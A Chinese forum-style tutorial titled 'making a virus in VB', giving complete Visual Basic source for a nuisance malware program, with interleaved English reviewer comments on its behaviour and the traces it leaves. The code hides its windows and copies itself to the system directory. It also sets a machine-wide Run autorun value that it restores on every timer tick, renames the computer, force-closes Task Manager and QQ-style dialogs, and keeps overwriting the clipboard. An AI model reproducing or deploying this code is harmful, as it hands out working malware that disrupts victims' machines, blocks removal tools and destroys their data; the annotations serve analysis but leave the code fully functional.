

用VB做病毒

你们好!今天我做了一个简单的病毒!希望和大家讨论讨论!

这病毒的功能如下

1 运行时隐藏起来

2 自我复制到系统目录下

3 WIN启动时自我运行

4 不准重复打开这个程序

5 程序运行时不能打开任务管理器,QQ等!

6 计算机名称改变

7 每次粘贴时,出现的是“我是高手我怕谁,我爱你!”

首先介绍一下要用到的API吧(只说功能)

GetForegroundWindow 获得前台窗口的句柄

GetClassName 为指定的窗口取得类名

PostMessage 将一条消息投递到指定窗口的消息队列

GetWindowText 取得一个窗体的标题文字

SetComputerName 设置新的计算机名

GetSystemDirectory 取得Windows系统目录

GetWindow 获得一个窗口的句柄

ShowWindow 控制窗口的可见性

RegOpenKey 打开一个现有的注册表项

RegQueryValueEx 获取一个项的设置值

RegSetValueEx 设置指定项的值

RegCloseKey 关闭系统注册表中的一个项

然后开始编写!

1添加一个: Module1模块

Option Explicit

' Declare the Win32 APIs used by the sample (the ANSI "A" entry points, via Alias).
' Reviewer note: each import is an ordinary documented API. What identifies the sample is the
' combination the rest of the page uses them for: writing an autorun value under HKEY_LOCAL_MACHINE,
' hiding its own windows, polling the foreground window, and renaming the computer.

' Registry access (advapi32.dll).
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.

Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

' NOTE(review): GetCursorPos is never called in the code shown on the page, and the POINTAPI type
' it refers to is not defined anywhere on the page.
Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long

' Window inspection and messaging (user32).
Public Declare Function GetForegroundWindow Lib "user32" () As Long

Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

' System information and configuration (kernel32).
Public Declare Function SetComputerName Lib "kernel32" Alias "SetComputerNameA" (ByVal lpComputerName As String) As Long

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long

Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long

' Declare constants

' Predefined handle of the HKEY_LOCAL_MACHINE hive (machine-wide settings).
Public Const HKEY_LOCAL_MACHINE = &H80000002

' GetWindow relation code: return the owner window of the given window.
Public Const GW_OWNER = 4

' ShowWindow command: hide the window.
Public Const SW_HIDE = 0

' Sub-procedure that modifies the registry.
'
' Opens strPath under HKEY_LOCAL_MACHINE and, only when the value strKey cannot be queried
' (RegQueryValueEx returns non-zero), writes strValue into it with type 1 (REG_SZ).
' A value that can already be queried is left untouched.
'
'   strPath  - subkey path below HKEY_LOCAL_MACHINE
'   strKey   - name of the value to check / create
'   strValue - string data written when the value is missing
'
' Reviewer notes:
' - Return codes are only used for the two checks below; a failed write is not reported.
' - RegCloseKey is called whether or not the open succeeded.
' - s1 and n are assigned but never read.
' - The key is in HKEY_LOCAL_MACHINE, so the write needs an account with write access to that
'   hive. An unexpected new value appearing under a machine-wide key is a useful audit signal.
Public Sub regedit(strPath As String, strKey As String, strValue As String)

Dim l As Long

Dim s As String

Dim s1 As String

Dim n As Long

Dim keyhand As Long

' 255-character NUL-filled buffers; only s is passed to an API call.
s = String(255, Chr(0))

s1 = String(255, Chr(0))

n = 255

l = RegOpenKey(HKEY_LOCAL_MACHINE, strPath, keyhand)

' NOTE(review): the trailing text on the next line is a remark ("was the key opened?") that has
' lost its comment marker on the page. The same applies to the inner If ("does the value exist?").
If l = 0 Then 是否打开

l = RegQueryValueEx(keyhand, strKey, 0, 1, ByVal s, 255)

If l <> 0 Then 是否也有

l = RegSetValueEx(keyhand, strKey, 0, 1, ByVal strValue, LenB(strValue))

' Modify the registry

End If

End If

l = RegCloseKey(keyhand)

' Close the key

End Sub

2 回到Form1,双击窗体:

Option Explicit

' Form-level variable: the Windows system directory path. Form_Load fills it in and
' Timer1_Timer reads it again when it rebuilds the autorun command line.
Dim systempath As String

选择LOAD事件

' Form load handler: enforces a single instance, copies the executable into the system directory,
' registers it for autorun, renames the computer, hides the program's windows and starts Timer1.
'
' Artefacts this routine leaves on a host (all values as given on the page):
' - file  <system directory>\liuning.exe
' - value "高手小病毒" under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
'   pointing at that file
' - computer name set to "QQ122273014"
Private Sub Form_Load()

Dim K As Long

' Do not allow the program to be opened twice
' If another instance is already running: blank this instance's title and caption, activate the
' window that carries the original title, then terminate this instance.

Dim title As String

If App.PrevInstance Then

title = App.title

App.title = ""

Me.Caption = ""

AppActivate title

End

End If

'--------------

' Get the system directory
' The buffer is NUL-filled and then trimmed at the first NUL after the call.

systempath = String(255, Chr(0))

GetSystemDirectory systempath, 254

systempath = Left(systempath, InStr(systempath, Chr(0)) - 1)

' Copy itself into the system directory
' Skipped when a file named liuning.exe already exists there; only the file name is compared.

If Not Dir(systempath & "\" & "liuning.exe") = "liuning.exe" Then

FileCopy App.Path & "\" & App.EXEName & ".exe", systempath & "\" & "liuning.exe"

End If

' Run automatically
' Adds the Run value via regedit(), which writes only when the value is not already present.

regedit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "高手小病毒", systempath & "\" & "liuning" & ".exe"

' Rename the computer
' The return value is ignored. Per the API's documentation, the new name applies after the next restart.

SetComputerName "QQ122273014"

' Hide
' Hides the form's owner window (GW_OWNER) and then the form itself, so the running program
' shows no window. The process and its autorun entry remain visible to process and registry
' inspection.

K = GetWindow(Me.hwnd, GW_OWNER)

ShowWindow K, SW_HIDE

Timer1.Enabled = True

Me.Hide

End Sub

再添加一个Timer1控件

' Timer tick handler. On every tick it:
'   1. reads the class name and title of the current foreground window and posts message &H10
'      (WM_CLOSE) to it under the conditions below;
'   2. replaces the clipboard contents with a fixed string;
'   3. calls regedit() again so the Run value is recreated if it has been removed.
'
' Reviewer notes:
' - The timer interval is set on the control and is not shown on the page.
' - Because of step 3, deleting the Run value while the process is running does not stick.
'   Cleanup has to end the process before removing the value and the copied file.
' - Step 1 inspects only the foreground window's class and title prefix, so process inspection
'   that does not present such a window is not matched by this check.
Private Sub Timer1_Timer()

' Key part

Dim K As Long

Dim s As String

Dim s1 As String

' Static: the counter keeps its value between ticks.
Static n As Long

s = Space(19)

s1 = Space(19)

' Get the handle of the foreground window

K = GetForegroundWindow

' Get its class name

GetClassName K, s, 20

' Read the title of the current program

GetWindowText K, s1, 20

' Close the window when it is QQ or anything else whose class name is #32770
' (#32770 is the standard Windows dialog class.)

If Left(s, 6) = "#32770" Then

' The window is the Windows task manager
' Matched by a title that starts with "Windows"; it is closed immediately on every tick.

If Left(s1, 7) = "Windows" Then

PostMessage K, &H10, 0&, 0& ' close the window

Exit Sub

End If

' Any other #32770 window in the foreground is counted. On the 40th such tick it is closed
' and the counter is reset.

n = n + 1

If n >= 40 Then

PostMessage K, &H10, 0&, 0& ' close the window

n = 0

End If

End If

' This is what appears when the user pastes
' The clipboard is cleared and overwritten on every tick, so copied data is lost.

Clipboard.Clear

Clipboard.SetText "我是高手我怕谁,我爱你!"

' Keep the registry entry from being deleted
' regedit() writes only when the value is missing, so this call restores a removed value.

regedit "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "高手小病毒", systempath & "\" & "liuning" & ".exe"

End Sub
